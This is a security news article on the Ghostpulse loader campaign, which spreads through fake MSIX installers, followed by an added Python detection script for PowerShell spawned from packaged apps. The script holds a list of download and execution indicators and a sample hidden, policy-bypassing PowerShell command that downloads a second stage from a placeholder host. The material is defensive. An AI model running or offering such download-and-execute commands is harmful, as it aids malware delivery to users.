Researchers at Elastic Security Labs discovered a new malware campaign that leverages MSIX application packages to infect Windows machines with a stealthy malware loader called ‘Ghostpulse.’ The loader uses defense evasion techniques to decrypt and inject its final payload into the system.
MSIX is a new unified packaging format that allows organizations to create secure and high-performing applications.
“With App Installer, MSIX packages can be installed with a double click. This makes them a potential target for adversaries looking to compromise unsuspecting victims. However, MSIX requires access to purchased or stolen code signing certificates, making them viable to groups of above-average resources,” the researchers said.
The victims are lured to download malicious MSIX packages through compromised websites, search engine optimization (SEO) techniques, or malvertising. The researchers said they observed malicious packages masquerading as installers for Chrome, Brave, Microsoft Edge, Grammarly, and WebEx.
Once the user clicks on the “Install” button, a PowerShell script is covertly executed to download, decrypt, and run Ghostpulse on the system.
The infection chain has three stages leading to the final payload. The first stage is embedded in a malicious DLL that is side-loaded through a benign executable. The second stage is decrypted from a file downloaded by the PowerShell script. The third stage is injected into a legitimate process using process hollowing. To inject the final payload into a new child process, Ghostpulse employs Process Doppelgänging, which leverages the NTFS transactions feature.
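The first observable step in the chain described above is PowerShell being launched from an MSIX-packaged installer to fetch and decode the next stage. The following is an added example of the kind of process-creation triage a defender can run over endpoint telemetry; it is not code from the Elastic Security Labs report. It assumes packaged apps live under the default WindowsApps directory, uses a constructed set of events in a Sysmon-like shape, and treats the indicator list as a starting heuristic rather than a definitive rule.

```python
"""Flag PowerShell launched from an MSIX-packaged app with download/decode indicators.

Added example for triaging process-creation telemetry; the events below are constructed.
"""
import re
from dataclasses import dataclass

# Assumption: MSIX packages install under the default WindowsApps directory.
MSIX_ROOT = "c:\\program files\\windowsapps\\"

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line fragments that suggest download, decoding, hidden or in-memory execution.
# This list is a heuristic starting point, not an exhaustive signature.
INDICATORS = [
    r"invoke-webrequest", r"\biwr\b", r"downloadfile", r"downloadstring",
    r"-encodedcommand", r"\s-e(nc|c)?\s", r"frombase64string",
    r"invoke-expression", r"\biex\b",
    r"-windowstyle\s+hidden", r"-w\s+hidden",
    r"-executionpolicy\s+bypass", r"-ep\s+bypass",
]
INDICATOR_RE = re.compile("|".join(INDICATORS), re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (shape modelled on Sysmon Event ID 1 fields)."""
    event_id: int
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_msix_parent(path: str) -> bool:
    """True when the parent binary was launched from the packaged-app store."""
    return path.lower().replace("/", "\\").startswith(MSIX_ROOT)


def analyze(event: ProcessEvent):
    """Return a list of reasons when the event matches, otherwise None.

    Both conditions must hold: PowerShell spawned by a packaged app AND a
    command line carrying download/decode/hidden-execution indicators.
    Requiring both keeps ordinary packaged apps that run plain scripts quiet.
    """
    if basename(event.image) not in POWERSHELL_IMAGES:
        return None
    reasons = []
    if is_msix_parent(event.parent_image):
        reasons.append("parent is an MSIX-packaged app")
    hits = sorted({m.group(0).strip().lower() for m in INDICATOR_RE.finditer(event.command_line)})
    if hits:
        reasons.append("command line contains " + ", ".join(hits))
    return reasons if len(reasons) == 2 else None


def find_suspicious(events):
    """Map event_id -> reasons for every event that matches."""
    findings = {}
    for event in events:
        reasons = analyze(event)
        if reasons:
            findings[event.event_id] = reasons
    return findings


# Constructed sample telemetry (package names, paths and URL are placeholders).
SAMPLE_EVENTS = [
    ProcessEvent(1, r"C:\Windows\explorer.exe", r"C:\Program Files\Browser\browser.exe", "browser.exe"),
    ProcessEvent(2, r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Service"),
    ProcessEvent(3, r"C:\Program Files\WindowsApps\ExampleApp_1.0.0.0_x64__placeholder\app.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -File setup.ps1"),
    ProcessEvent(4, r"C:\Program Files\WindowsApps\FakeBrowserInstaller_1.0.0.0_x64__placeholder\install.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command '
                 r'"Invoke-WebRequest http://example.invalid/stage2.bin -OutFile $env:TEMP\stage2.bin"'),
]

if __name__ == "__main__":
    for event_id, reasons in find_suspicious(SAMPLE_EVENTS).items():
        print(f"event {event_id}: " + "; ".join(reasons))
```

Event 3 shows why the two-condition rule matters: a legitimate packaged app running a plain script stays quiet, while event 4 is raised because the PowerShell child both descends from the WindowsApps tree and carries hidden-window, policy-bypass and download indicators. In a real deployment the parent-path check would be paired with the package's signer identity, since the report notes these campaigns rely on purchased or stolen code signing certificates.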
The final payload varies from sample to sample but is typically an information stealer such as SectopRAT, Rhadamanthys, Vidar, Lumma, and NetSupport, Elastic Security Labs said.